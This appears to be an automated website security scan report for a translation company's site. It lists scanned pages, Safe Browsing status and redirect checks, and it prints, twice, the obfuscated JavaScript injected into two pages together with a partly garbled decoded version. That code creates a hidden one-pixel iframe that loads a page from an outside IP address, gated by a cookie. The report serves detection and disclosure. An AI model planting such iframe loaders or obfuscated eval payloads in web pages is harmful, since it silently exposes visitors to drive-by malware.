Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=translation.sercominter.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://translation.sercominter.com/ | 200 OK Content-Length: 19016 Content-Type: text/html | clean |
http://translation.sercominter.com/index_en.html | 200 OK Content-Length: 18996 Content-Type: text/html | clean |
http://translation.sercominter.com/empresa_en.html | 200 OK Content-Length: 29057 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e86842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e86843c8180712e4b2e357682827e483d3d3f3e3f3c3f3f3e3c3f44463c3f3e423d467e5e82565966543c7e767e35491b182e86843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e86843c8182877a733c707d807273802e4b2e353e35491b182e86843c8182877a733c7673777576822e4b2e353f
Decoded script:
String String
function zzzfff() {
  var xv = document.createElement('iframe');
  xv.src = 'http://101.110.168.104/8pPtHKXF.php';
  xv.style.position = 'absolute';
  xv.style.border = '0';
  xv.style.height = '1px';
  xv.style.width = '1px';
  xv.style.left = '1px';
  xv.style.top = '1px';
  if (!document.getElementById('xv')) {
    document.write('<div id=\'xv\'></div>');
    document.getElementById('xv').appendChild(x ( name != document.cookie.substring( 0, name.length ) ) ) { return null; }
  if ( start == -1 ) return null;
  var end = document.cookie.indexOf( ";", len );
  if ( end == -1 ) end = document.cookie.length;
  return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled) {
  if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); }
}
Antivirus reports:
http://translation.sercominter.com/empresa_en_files/jwplayer.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/test404page.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/empresa_en_files/video-embed-rewriter.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/empresa_en_files/disclaim-element.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/empresa_en_files/graph-calc.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/empresa_en_files/jquery.js | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/presupuesto_en.htm | 200 OK Content-Length: 28042 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e86842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e86843c8180712e4b2e357682827e483d3d3f3e3f3c3f3f3e3c3f44463c3f3e423d467e5e82565966543c7e767e35491b182e86843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e86843c8182877a733c707d807273802e4b2e353e35491b182e86843c8182877a733c7673777576822e4b2e353f
Decoded script:
String String
function zzzfff() {
  var xv = document.createElement('iframe');
  xv.src = 'http://101.110.168.104/8pPtHKXF.php';
  xv.style.position = 'absolute';
  xv.style.border = '0';
  xv.style.height = '1px';
  xv.style.width = '1px';
  xv.style.left = '1px';
  xv.style.top = '1px';
  if (!document.getElementById('xv')) {
    document.write('<div id=\'xv\'></div>');
    document.getElementById('xv').appendChild(x ( name != document.cookie.substring( 0, name.length ) ) ) { return null; }
  if ( start == -1 ) return null;
  var end = document.cookie.indexOf( ";", len );
  if ( end == -1 ) end = document.cookie.length;
  return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled) {
  if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); }
}
Antivirus reports:
http://translation.sercominter.com/presupuesto.cfm-40idioma=en | 200 OK Content-Length: 25416 Content-Type: text/plain | clean |
http://translation.sercominter.com/traductores.cfm-40idioma=en | 200 OK Content-Length: 17872 Content-Type: text/plain | clean |
http://translation.sercominter.com/clientes.cfm-40idioma=en | 200 OK Content-Length: 16792 Content-Type: text/plain | clean |
http://translation.sercominter.com/traductores_en.htm | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
http://translation.sercominter.com/enlaces_en.html | 404 Not Found Content-Length: 961 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: translation.sercominter.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 08:17:38 GMT
Accept-Ranges: bytes
ETag: "13bc0ee-4a48-90f92a40"
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 mod_python/3.2.10 Python/2.4.4 PHP/4.4.4-8+etch6 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Content-Length: 19016
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Mon, 13 Jan 2014 14:05:21 GMT
...19016 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: translation.sercominter.com
Referer: http://www.google.com/search?q=translation.sercominter.com
Result:
The result is similar to the first query. There are no suspicious redirects found.